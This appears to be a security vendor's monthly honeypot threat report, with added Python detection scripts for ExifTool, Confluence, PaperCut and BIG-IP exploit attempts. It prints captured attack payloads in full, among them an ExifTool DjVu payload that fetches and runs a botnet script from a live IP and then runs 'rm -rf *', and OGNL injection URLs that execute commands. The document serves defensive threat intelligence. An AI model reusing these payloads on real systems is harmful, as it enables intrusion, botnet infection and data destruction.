After a summer break, we are back with observations from our honeypots to keep you informed about what is going on on the Internet. Tracking trends and keeping an eye on what threat actors actively scan for during their reconnaissance phase allows us to adjust our cybersecurity posture.
The following report focuses on logs from the past month.
Check out our previous report here.
Mirai-based variants downloaded in JPG files
In August 2023, TEHTRIS monitored 11 IP addresses sending POST requests carrying a JPG file that hid commands to download the Mirai botnet. All of the requests targeted a Singaporean honeypot.
- Timeline
We observed a constant flow of incoming requests from July 31st until August 11th, then a decrease followed by a surge on August 15th.
The command lines appear to be hidden in the JPG metadata and would likely be executed upon opening the image.
- Characteristics of the requests
The URL is “/$” followed by 4 digits.
| URL | Count |
| --- | --- |
| /$3261 | 97.15% |
| /$6684 | 2.478% |
| /$6341 | 0.248% |
| /$5341 | 0.124% |
The RawData section contains the interesting part :
'--0002cdabf64440e48c7a0192d8bef98e\r\nContent-Type: image/jpeg\r\nContent-Disposition: form-data; name="file"; filename="lol.jpg"\r\nContent-Length: 1251\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright "\\\n" . qx{cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://195.58.39.193/trc.sh; curl -O <URL>; chmod 777 <filename>; sh <filename>;; rm -rf *;}. \\\n" b ") ) \n} . \\\n" b ") ) \n\r\n--0002cdabf64440e48c7a0192d8bef98e--\r\n'
This is very likely an attempt to exploit CVE-2021-22204 (CVSS3 7.8) and/or CVE-2021-22205 (CVSS3 10), a vulnerability in ExifTool that can lead to arbitrary code execution due to improper neutralization of user data in the DjVu file format. ExifTool is an open-source program for reading, writing and manipulating image metadata, used as a component in GitLab among others. This allows an attacker to execute commands hidden in the metadata.
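As an added example (not code from the TEHTRIS report), the following Python script shows how a defender can triage such uploads from honeypot or web-server captures: it splits the multipart body, checks whether a part declared as image/jpeg actually starts with JPEG magic bytes, and flags DjVu containers whose metadata carries Perl execution constructs such as qx{...}, then extracts any download URLs from the hidden command. The sample body is a constructed, shortened reconstruction of the RawData quoted above (only the trc.sh URL from the report is kept); the function and constant names are our own.

```python
import re
from typing import Dict, List

# Magic bytes: a genuine JPEG begins with FF D8 FF; a DjVu container begins with "AT&TFORM".
JPEG_MAGIC = b"\xff\xd8\xff"
DJVU_MAGIC = b"AT&TFORM"

# Perl constructs that a vulnerable ExifTool (CVE-2021-22204) would evaluate when they
# appear inside a DjVu annotation chunk: qx{...}, backticks, system(), exec().
PERL_EXEC_RE = re.compile(rb"qx\{|`[^`]+`|\bsystem\(|\bexec\(")
URL_RE = re.compile(rb"https?://[^\s;'\"<>]+")


def split_multipart(body: bytes) -> List[Dict[str, object]]:
    """Split a multipart/form-data body into parts, each with its headers and payload.

    The boundary is read from the first line, so no Content-Type request header is needed.
    """
    boundary, _, _ = body.partition(b"\r\n")
    if not boundary.startswith(b"--"):
        return []
    parts: List[Dict[str, object]] = []
    for chunk in body.split(boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "payload": payload.rstrip(b"\r\n")})
    return parts


def inspect_upload(body: bytes) -> Dict[str, object]:
    """Flag uploads whose declared image type does not match the bytes, and DjVu payloads
    that embed Perl code in their metadata. Returns the findings as a dict."""
    findings: Dict[str, object] = {"mismatched_magic": False, "perl_exec": False, "urls": []}
    for part in split_multipart(body):
        ctype = part["headers"].get(b"content-type", b"")  # type: ignore[union-attr]
        data = part["payload"]
        if ctype.startswith(b"image/jpeg") and not data.startswith(JPEG_MAGIC):
            findings["mismatched_magic"] = True
        if data.startswith(DJVU_MAGIC) and PERL_EXEC_RE.search(data):
            findings["perl_exec"] = True
            findings["urls"] += [u.decode(errors="replace") for u in URL_RE.findall(data)]
    findings["suspicious"] = findings["mismatched_magic"] or findings["perl_exec"]
    return findings


# Constructed sample: a shortened reconstruction of the RawData quoted in the report.
MALICIOUS_BODY = (
    b"--0002cdabf64440e48c7a0192d8bef98e\r\n"
    b"Content-Type: image/jpeg\r\n"
    b'Content-Disposition: form-data; name="file"; filename="lol.jpg"\r\n'
    b"\r\n"
    b"AT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.FORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P"
    b'(metadata\n\t(Copyright "\\\n" . qx{cd /tmp; wget http://195.58.39.193/trc.sh; sh trc.sh} . "))\n'
    b"\r\n--0002cdabf64440e48c7a0192d8bef98e--\r\n"
)

# Constructed sample: a harmless upload whose bytes really are a JPEG header.
BENIGN_BODY = (
    b"--b\r\nContent-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0benign-jpeg-data\r\n--b--\r\n"
)

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_upload(body))
```

The two checks are independent on purpose: the magic-byte mismatch catches any disguised upload regardless of payload type, while the DjVu/Perl check pinpoints the ExifTool vector and yields the download URLs to pivot on (IoC extraction). Run it against captured request bodies, not against files already processed by ExifTool.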
- Downloaded files
Among the hundreds of requests, 6 unique URLs appear in the RawData, 4 of them downloading Mirai-based variants:
- Shell script trc.sh (sha256 6e01afe2c976a0eefc86312abc911850f611f9f15d944449e148f8749e647f76) known for being a Medusa botnet downloader, is found in 90% of all requests
- ELF file x-8.6.blaze (sha256 e4a89d0596681b36ca880374a28e3728211ec1b69d25216225b83930852c06d0) linked with the Gafgyt botnet
- ELF file x86 (sha256 a204df812308f4426796a1d0a06b06e33b40095189a83b6a7439cd455c2439d3)
- ELF file sora.x86 (sha256 76a75dfab207a8356b959f765e94452e4bc28ae00364c12f2186bb3805506195)
The other two URLs had never been submitted to VirusTotal prior to our investigation.
- IoCs
IP addresses:
204.10.194[.]68
74.50.95[.]126
84.54.51[.]204
94.156.102[.]66
193.34.212[.]110
190.211.252[.]50
45.128.232[.]83
66.118.232[.]225
193.177.182[.]23
45.95.146[.]79
64.112.72[.]102
URLs:
http[:]//195.58.39[.]193/trc.sh
http[:]//45.41.241[.]48/x86_64
http[:]//87.121.113[.]147/bins/sshdx86
http[:]//94.156.102[.]166/x-8.6.blaze
http[:]//45.41.241[.]48/x86_64
http[:]//104.234.220[.]161/sora.x86
Swedish IP address targeting Lithuanian honeypots
The same Swedish IP address 77.91.87[.]196 (AS 210644 AEZA GROUP Ltd) attempted to find vulnerabilities on our Lithuanian honeypots on August 6th and 9th. The IP address is only flagged as malicious by 3 vendors on VirusTotal and by none on other databases, and over the past week about a dozen sources have gradually reported it to AbuseIPDB. Here is a recap of the exploit attempts:
- Confluence OGNL injection vulnerability (CVE-2022-26134)
Incoming GET requests from Swedish IP address 77.91.87[.]196 probed our Lithuanian honeypots to find Confluence servers vulnerable to the OGNL injection vulnerability tracked as CVE-2022-26134 (CVSS3 9.8). OGNL is a popular expression language for Java. OGNL injection can lead to remote code execution.
URL :
/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun")}/
/${@java.lang.Runtime@getRuntime().exec("nslookup cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site")}/
The attacker triggers a DNS request to a domain under oast.site or oast.fun to check whether the target can reach it, and will probably use a second command to download a malicious payload. For instance, at the time of writing, cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun resolves to the Singaporean IP address 206.189.156[.]69, which is known for communicating with malicious files such as trojans.
The vulnerability has been fixed in later versions.
- PaperCut Authentication Bypass (CVE-2023-27350)
CVE-2023-27350 (CVSS3 9.8) is a vulnerability disclosed by PaperCut in March 2023 which enables an unauthenticated attacker to execute malicious code remotely without credentials. According to an advisory by CISA, the vulnerability was exploited in the wild – including by the Bl00dy ransomware gang in a campaign against the education sector.
GET request: /app?service=page/SetupCompleted
A patch has since been released.
- BIG-IP iControl REST Authentication Bypass (CVE-2022-1388)
CVE-2022-1388 (CVSS3 9.8) is a vulnerability affecting BIG-IP systems which allows an unauthenticated attacker to execute arbitrary system commands, create or delete files, or disable services.
POST request : /mgmt/tm/util/bash
- BIG-IP/BIG-IQ iControl REST RCE Attempt (CVE-2021-22986)
Packets similar to those detailed in our Report 15 were detected.
- IoCs
77.91.87[.]196
206.189.156[.]69
cj7kh47mlg33m43j1d4g5o78ku3eei6ow[.]oast[.]fun
cj9g0jfmlg3ap2tc51n0nar1cc9wx4sup[.]oast[.]site
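The three request signatures listed above (Confluence OGNL injection in the URL, the PaperCut SetupCompleted page, and a POST to the BIG-IP bash endpoint) are easy to turn into detection rules for honeypot or proxy logs. The script below is an added example written for this report and not TEHTRIS tooling: it applies one rule per CVE to a "METHOD PATH" log line, and additionally pulls out any out-of-band callback domain under oast.fun or oast.site (the two TLDs seen in the requests) so the analyst can pivot on it. The log lines are constructed from the URLs quoted in the report; the rule set, regexes and function names are our own assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed honeypot log lines modelled on the requests quoted in the report ("METHOD PATH").
SAMPLE_LOG = [
    'GET /${@java.lang.Runtime@getRuntime().exec("nslookup cj7kh47mlg33m43j1d4g5o78ku3eei6ow.oast.fun")}/',
    'GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/',
    "GET /app?service=page/SetupCompleted",
    "POST /mgmt/tm/util/bash",
    "GET /index.html",
]

# One rule per exploit attempt described in the report: (name, allowed methods, path regex).
RULES = [
    ("CVE-2022-26134 Confluence OGNL injection", ("GET", "POST"),
     re.compile(r"/\$\{.*@java\.lang\.Runtime@")),
    ("CVE-2023-27350 PaperCut SetupCompleted access", ("GET",),
     re.compile(r"^/app\?service=page/SetupCompleted")),
    ("CVE-2022-1388 BIG-IP iControl REST bash", ("POST",),
     re.compile(r"^/mgmt/tm/util/bash")),
]

# Out-of-band callback domains; only the two TLDs observed in the report are listed.
OAST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.oast\.(?:fun|site))\b", re.I)


def triage(line: str) -> Dict[str, object]:
    """Match one log line against RULES and extract callback domains from the path."""
    method, _, path = line.partition(" ")
    path = unquote(path)  # attackers often URL-encode the OGNL braces and quotes
    hits: List[str] = [name for name, methods, rx in RULES
                       if method in methods and rx.search(path)]
    return {"method": method, "path": path, "rules": hits,
            "callbacks": OAST_RE.findall(path)}


def triage_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the lines that matched at least one rule, in log order."""
    return [t for t in (triage(line) for line in lines) if t["rules"]]


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["method"], hit["rules"], hit["callbacks"])
```

The method check matters for the BIG-IP rule: a GET to /mgmt/tm/util/bash is a scanner probe, whereas the documented bypass is a POST. Decoding the path before matching keeps the OGNL rule effective when the payload arrives percent-encoded, and the extracted oast.* hostnames can be fed straight into DNS log searches to find which internal hosts actually resolved them.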
Mikrotik Winbox RCE Attempt (CVE-2018-14847)
Between August 8th and 14th, we monitored attempts to exploit CVE-2018-14847 (CVSS3 9.1) coming from 3 IP addresses :
| IP source | Country | AS |
| --- | --- | --- |
| 5.104.80[.]129 | DK | AS 14199 (Contabo Asia Private Limited) |
| 51.158.24[.]19 | FR | AS 12876 (Scaleway S.a.s.) |
| 185.38.148[.]134 | GB | AS 25369 (Hydra Communications Ltd) |
CVE-2018-14847 (CVSS3 9.1) is a vulnerability affecting MikroTik RouterOS that allows an unauthenticated remote attacker to read and write arbitrary files due to a directory traversal vulnerability in the WinBox interface. It was fixed in 2018 and added to CISA’s Known Exploited Vulnerabilities catalog in December 2021. Well, apparently, it is still exploited in the wild – although this is the first time we have detected this exploit attempt in 2023.
Packets were sent over on TCP/80, TCP/445, TCP/51801 and TCP/52802.
The targets were exclusively European honeypots, with Lithuania, the Czech Republic and the United Kingdom ahead.
- IoCs
5.104.80[.]129
51.158.24[.]19
185.38.148[.]134
Russian IP addresses probing for vulnerable Asus routers
WordPress vulnerability
Information remains TEHTRIS’ sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assumes no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied, regarding the accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.